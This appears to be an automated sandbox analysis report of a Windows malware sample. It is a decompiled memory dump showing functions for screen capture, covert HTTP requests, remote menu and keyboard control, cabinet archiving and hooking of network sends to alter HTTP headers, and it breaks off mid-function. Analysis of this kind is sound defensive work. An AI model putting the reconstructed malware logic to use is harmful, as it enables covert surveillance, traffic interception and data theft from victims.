#5.WS2_32 ref: 00409805

Strings

QASW, xrefs: 00409675
TSEV, xrefs: 0040966E
W, xrefs: 00409793
UYPA, xrefs: 004097B0
GEAP, xrefs: 004097B8
, xrefs: 00409680
MISP, xrefs: 004097D6
D, xrefs: 00409799
U, xrefs: 0040970C
RTAP, xrefs: 004097CE
QASR, xrefs: 004097C0

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leave
String ID: $D$GEAP$MISP$QASR$QASW$RTAP$TSEV$U$UYPA$W
API String ID: 2801635615-3373209534
Opcode ID: 40ad841b13249b3664b07af2ad65c3cf11ef7f51ff53cc02fd81e998d00f7964
Instruction ID: b9e4a9309e5e94245bf626c80a04a04582ab43e1f3574ed63d1bbc542ddbd412
Opcode Fuzzy Hash: 40ad841b13249b3664b07af2ad65c3cf11ef7f51ff53cc02fd81e998d00f7964
Instruction Fuzzy Hash: A1513733524211AADF31AE258C817AB77909B42310F188A3BF994B73E3D73DCC81875A

Uniqueness

Uniqueness Score: -1.00%

Function 00416770, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416770(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v1141;
				char _v1400;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E0040C275(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E00413140(0x84889911,  &_v128, 0);
					_t66 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E00413140(0x84889912,  &_v128, 1);
					_t71 = CreateEventW(0x4238d8, 1, 0,  &_v128);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E00413140(0x18782822,  &_v128, 1);
					_t75 = CreateMutexW(0x4238d8, 0,  &_v128);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E00413140(0x9878a222,  &_v128, 1);
					_t79 = CreateFileMappingW(0, 0x4238d8, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v9 = 0;
					_t82 = GetDC(0);
					_v16 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v16, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x423ea0
						_t87 = E00412760(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v16);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v20;
						_t90 =  *(_v20 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E0040C1C2(_t119);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E0041341A( &_v1400);
						E00413447(_t119,  &_v616);
						_t43 =  &(_t124[0xf]); // 0x423ebc
						E0040C1FE(_t43, 0x423b18, 0x10);
						_t124[0x13] = _v138;
						_t47 =  &(_t124[0x14]); // 0x423ed0
						E0040C1FE(_t47,  &_v1141, 0x102);
						E00413140(0x1898b122,  &_v128, 1);
						_t107 = CreateMutexW(0x4238d8, 0,  &_v128);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x00416770
0x00416770
0x00416784
0x00416789
0x0041678f
0x00416795
0x004167a8
0x004167b1
0x004167b7
0x004167ba
0x004167bc
0x00000000
0x00000000
0x004167c9
0x004167db
0x004167e1
0x004167e4
0x004167e6
0x00000000
0x00000000
0x004167f3
0x004167fe
0x00416804
0x00416807
0x00416809
0x00000000
0x00000000
0x00416816
0x00416829
0x0041682f
0x00416831
0x00416833
0x00000000
0x00000000
0x0041683f
0x00416845
0x00416847
0x00000000
0x00000000
0x0041684d
0x00416856
0x00416859
0x0041685c
0x00416862
0x00416865
0x00416867
0x004169d2
0x00000000
0x004169d2
0x00416876
0x00416879
0x00416883
0x00416886
0x00416888
0x00416896
0x0041689b
0x0041689d
0x004168b4
0x004168b4
0x0041689f
0x004168a2
0x004168ad
0x004168ad
0x004168b9
0x004168bd
0x004168c3
0x004168c6
0x004168cc
0x004168d3
0x004168d7
0x004168dd
0x004168e1
0x004168e4
0x004168e6
0x004168eb
0x004168eb
0x004168eb
0x004168ef
0x004168f2
0x004168f7
0x004168fb
0x004168ff
0x00000000
0x00000000
0x0041690b
0x0041690e
0x0041691a
0x00416926
0x0041692a
0x00416935
0x00416944
0x00416948
0x00416958
0x00416967
0x0041696d
0x00416973
0x00416975
0x00000000
0x00000000
0x0041697c
0x00416982
0x00416985
0x00416987
0x0041698a
0x00416990
0x00416996
0x00416998
0x004169a1
0x004169a3
0x004169a9
0x004169ab
0x004169b4
0x004169ba
0x004169c0
0x004169c2
0x004169c4
0x004169c4
0x004169c2
0x004169ab
0x004169cc
0x004169cc
0x00416987
0x00000000
0x004168c6
0x00416797
0x00000000

APIs

TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 004167B1
CreateEventW.KERNEL32(004238D8,00000001,00000000,?,84889912,?,00000001), ref: 004167DB
CreateMutexW.KERNEL32(004238D8,00000000,?,18782822,?,00000001), ref: 004167FE
CreateFileMappingW.KERNEL32(00000000,004238D8,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00416829
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0041683F
GetDC.USER32(00000000), ref: 0041685C
GetDeviceCaps.GDI32(00000000,00000008), ref: 0041687C
GetDeviceCaps.GDI32(?,0000000A), ref: 00416886
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00416899

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: 2784f635248f6cdd828a06e8ec473bfad62f3b99f74f898d20854b94f90a40b8
Instruction ID: c4e02ad7d8ed0cd74ffe86ba3250f7285f305eb0699ddfbb52410a6b0036ad9e
Opcode Fuzzy Hash: 2784f635248f6cdd828a06e8ec473bfad62f3b99f74f898d20854b94f90a40b8
Instruction Fuzzy Hash: 28713FB1900748AFDB209FB1CD85EEBBBECEB08304F10493EF551E6651D679A9848B24

Uniqueness

Uniqueness Score: -1.00%

Function 00415A88, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415A88(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				void* _t63;
				void* _t67;
				void* _t94;
				void* _t99;
				char* _t101;
				intOrPtr* _t109;
				void* _t113;
				intOrPtr* _t114;
				signed int _t120;
				void* _t122;

				_t122 = (_t120 & 0xfffffff8) - 0x224;
				_t109 = _a4;
				if(E00410C20( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x423b14, 0, 0, 0, 0);
				_v536 = _t53;
				if(_t53 == 0) {
					L24:
					E0040C1C2(_v552);
					E0040C1C2(_v552);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
				_v592 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v568);
					goto L24;
				}
				_t58 =  *_t109;
				_t101 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t101 = "GET";
				}
				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v620 = _t99;
				if(_t99 == 0) {
					L22:
					InternetCloseHandle(_v624);
					goto L23;
				} else {
					E00413447(_t101,  &_v576);
					_t63 = 0xe;
					E004128A5(_t63,  &_v600);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E0040CF86( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
						_t122 = _t122 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
							E0040C1C2(_v648);
						}
					}
					_t67 = 0xf;
					E004128A5(_t67,  &_v596);
					_v628 = E0040CD11( &_v572);
					_t113 = E0040C192(2 + _t69 * 6);
					if(_t113 == 0) {
						_t113 = 0;
					} else {
						E00410F4B(_t113,  &_v572, _v628);
						_t99 = _v628;
					}
					if(_t113 != 0 && E0040CF86( &_v632,  &_v596, _t113) > 0) {
						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
						E0040C1C2(_v648);
					}
					E0040C1C2(_t113);
					_t114 = _a4;
					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t99);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E0040E2F8( &_v668, _t99) != 0) {
								E0040C1C2(_t80);
							}
							E0040C1C2(_v656);
							E0040C1C2(_v656);
							 *((intOrPtr*)(_t114 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x00415a8e
0x00415a97
0x00415aa8
0x00415cb5
0x00415cbd
0x00415cbd
0x00415aba
0x00415ac0
0x00415ac6
0x00415ca3
0x00415ca7
0x00415cb0
0x00000000
0x00415cb0
0x00415adb
0x00415ae1
0x00415ae7
0x00415c99
0x00415c9d
0x00000000
0x00415c9d
0x00415aed
0x00415af3
0x00415af8
0x00415afa
0x00415afa
0x00415b30
0x00415b32
0x00415b38
0x00415c8f
0x00415c93
0x00000000
0x00415b3e
0x00415b43
0x00415b4e
0x00415b4f
0x00415b57
0x00415b5c
0x00415b69
0x00415b6e
0x00415b73
0x00415b81
0x00415b8b
0x00415b8b
0x00415b73
0x00415b96
0x00415b97
0x00415ba5
0x00415bb4
0x00415bb8
0x00415bd0
0x00415bba
0x00415bc5
0x00415bca
0x00415bca
0x00415bd4
0x00415bf9
0x00415c03
0x00415c03
0x00415c09
0x00415c0e
0x00415c25
0x00415c88
0x00415c89
0x00000000
0x00415c27
0x00415c38
0x00415c40
0x00415c4d
0x00000000
0x00415c59
0x00415c65
0x00415c68
0x00415c68
0x00415c71
0x00415c7a
0x00415c83
0x00000000
0x00415c83
0x00415c4d
0x00415c25

APIs

Part of subcall function 00410C20: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00410C4F

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00415ABA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00415ADB
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00415B2A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415B81
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415BF9
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00415C1C
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00415C44
InternetCloseHandle.WININET(00000000), ref: 00415C89
InternetCloseHandle.WININET(?), ref: 00415C93

Part of subcall function 0040E2F8: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040E30C
Part of subcall function 0040E2F8: GetLastError.KERNEL32 ref: 0040E316
Part of subcall function 0040E2F8: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040E336

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

InternetCloseHandle.WININET(?), ref: 00415C9D

Strings

HTTP/1.1, xrefs: 00415B1C
POST, xrefs: 00415AF3
GET, xrefs: 00415AFA, 00415B25

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: 8a33d638e098075d07a28905dcfe68c8e93b635b0cbec85da82b5a1953d58403
Instruction ID: 1045ac06f0503eb46e49225e69688b7bfeb0cead53b87b6ae1a33883b4bcb469
Opcode Fuzzy Hash: 8a33d638e098075d07a28905dcfe68c8e93b635b0cbec85da82b5a1953d58403
Instruction Fuzzy Hash: 1851B072104301EBC711AF61CD85DCBBFA9EFC4354F00092AF545A6172D739D985CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416CA7, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00416CA7(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x423e90);
					L23:
					SetEvent( *0x423e8c);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E0040A496( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423e80, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x423e90;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x00416ca7
0x00416cad
0x00416cb6
0x00416cb9
0x00416e38
0x00416e3e
0x00416e44
0x00416e52
0x00416e52
0x00416cbf
0x00416e07
0x00416e13
0x00416e23
0x00416e27
0x00416e2b
0x00000000
0x00416cce
0x00416cd7
0x00416cdb
0x00000000
0x00000000
0x00416ce1
0x00416ce7
0x00416ced
0x00416cef
0x00416cfa
0x00416d20
0x00416d20
0x00416d25
0x00416d3b
0x00416d40
0x00000000
0x00000000
0x00416d4f
0x00416d57
0x00416d59
0x00416d59
0x00416d69
0x00416d73
0x00416d89
0x00416dd8
0x00416de0
0x00416de9
0x00000000
0x00000000
0x00416deb
0x00416df9
0x00000000
0x00416df9
0x00416dda
0x00000000
0x00416dda
0x00416d93
0x00416d97
0x00416dc8
0x00416dc8
0x00416d97
0x00000000
0x00000000
0x00000000
0x00000000
0x00416cfc
0x00416cfc
0x00416d07
0x00416d0f
0x00416d15
0x00416d15
0x00416d19
0x00416d1a
0x00000000
0x00416cfc

APIs

GetMenu.USER32(?), ref: 00416CD1
GetMenuItemCount.USER32 ref: 00416CE7
GetMenuState.USER32 ref: 00416CFF
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00416D0F
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00416D35
GetMenuState.USER32 ref: 00416D49
EndMenu.USER32 ref: 00416D59
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00416D69
GetSubMenu.USER32 ref: 00416D8D
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00416DA7
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00416DC8
GetMenuItemID.USER32(00000000,00000000), ref: 00416DE0
SendMessageW.USER32(?,00000111,?,00000000), ref: 00416DF9
SetKeyboardState.USER32 ref: 00416E38
SetEvent.KERNEL32 ref: 00416E44

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 08266eebd79fe2778399582e0d8a9c367f48cf74a8e2688874db107420701d0c
Instruction ID: 203a56d81326ceb3e810a1155a4380fa8d9e50ebc72021fe374a88135e3552f4
Opcode Fuzzy Hash: 08266eebd79fe2778399582e0d8a9c367f48cf74a8e2688874db107420701d0c
Instruction Fuzzy Hash: 7941E134100344AFD7118F28DE88AAF7AA8EB84765F01472EF868A11F0C734CD91DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEA8, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FEA8() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t16;
				intOrPtr _t18;

				if( *0x423784 != 0) {
					L9:
					 *0x423784 =  *0x423784 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x423780 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x422dac = GetProcAddress(_t2, "FCICreate");
						 *0x423770 = GetProcAddress( *0x423780, "FCIAddFile");
						 *0x4229a4 = GetProcAddress( *0x423780, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x423780, "FCIDestroy");
						 *0x423778 = _t7;
						_t16 =  *0x422dac; // 0x0
						if(_t16 == 0 ||  *0x423770 == 0) {
							L7:
							FreeLibrary( *0x423780);
							goto L8;
						} else {
							_t18 =  *0x4229a4; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x4229a0 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x0040feb1
0x0040ff5c
0x0040ff5c
0x0040ff65
0x0040feb7
0x0040febc
0x0040fec2
0x0040fec9
0x0040ff58
0x0040ff5b
0x0040fecf
0x0040fee9
0x0040fefb
0x0040ff0d
0x0040ff12
0x0040ff14
0x0040ff1a
0x0040ff20
0x0040ff4c
0x0040ff52
0x00000000
0x0040ff2a
0x0040ff2a
0x0040ff30
0x00000000
0x0040ff36
0x0040ff3d
0x0040ff43
0x0040ff4a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ff4a
0x0040ff30
0x0040ff20
0x0040fec9

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040FF8F,?,004101AB,?,?,00000000,?), ref: 0040FEBC
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040FEDC
GetProcAddress.KERNEL32(FCIAddFile), ref: 0040FEEE
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040FF00
GetProcAddress.KERNEL32(FCIDestroy), ref: 0040FF12
HeapCreate.KERNEL32(00000000,00080000,00000000,004101AB,?,?,00000000,?), ref: 0040FF3D
FreeLibrary.KERNEL32(004101AB,?,?,00000000,?), ref: 0040FF52

Strings

FCIFlushCabinet, xrefs: 0040FEF0
FCIDestroy, xrefs: 0040FF02
cabinet.dll, xrefs: 0040FEB7
FCIAddFile, xrefs: 0040FEDE
FCICreate, xrefs: 0040FED6

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: 1d41957bb78e244d980a65dc0cd5259c8aa7619fc0701b0572c4ba8d1029d2be
Instruction ID: bcb643627350da741764bb36b1f46cc7c169d78bcd3ed2816b7aef1129235f4a
Opcode Fuzzy Hash: 1d41957bb78e244d980a65dc0cd5259c8aa7619fc0701b0572c4ba8d1029d2be
Instruction Fuzzy Hash: 7D11E8F0B41610BECA32AF25AD049167EB5F7C5B523A4467BE500A26A0D7791546AA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B12, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405B12(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				void* _v96;
				intOrPtr _v104;
				signed int _v108;
				void* _v112;
				void* _v132;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				void* _t207;

				_t207 = (_t205 & 0xfffffff8) - 0x5c;
				if(E004132A1() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x4223b0(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x4223c0);
					_t192 = _a4;
					_t184 = L00404B96(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x4223c0);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x4223dc;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x4223c0);
						_t195 = _a4;
						_t114 =  *0x4223b0(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x4223c0);
							_t115 = L00404B96(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x4223dc;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4334528
									_v88 =  *(_t117 + 0x28);
									E0040C275(E0040C1C2( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x4223bc(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4223c0);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x4223c0);
						_t197 = _a4;
						_t121 =  *0x4223b0(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x4223c0);
							_t122 = L00404B96(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x4223dc;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E00404C54(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x4223bc(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4223c0);
						}
						goto L36;
					}
					_t125 = E0040508A( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E004159FB( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E004150CD( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E0040C215(__eflags, _a8, _a12);
								 *(_t207 + 0x10) = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E00415A65( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E0040C1C2( *(_t186 + 0x14));
									E0040C1C2( *((intOrPtr*)(_t186 + 4)));
									_t149 = E0040C620(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
									 *((intOrPtr*)(_t207 + 0x14)) = E004110E9(E004110E9(E00411165(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E00415A65( *((intOrPtr*)(_t207 + 0x60)), _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E004159FB( &_v76);
								_t70 = _t186 + 0x24;
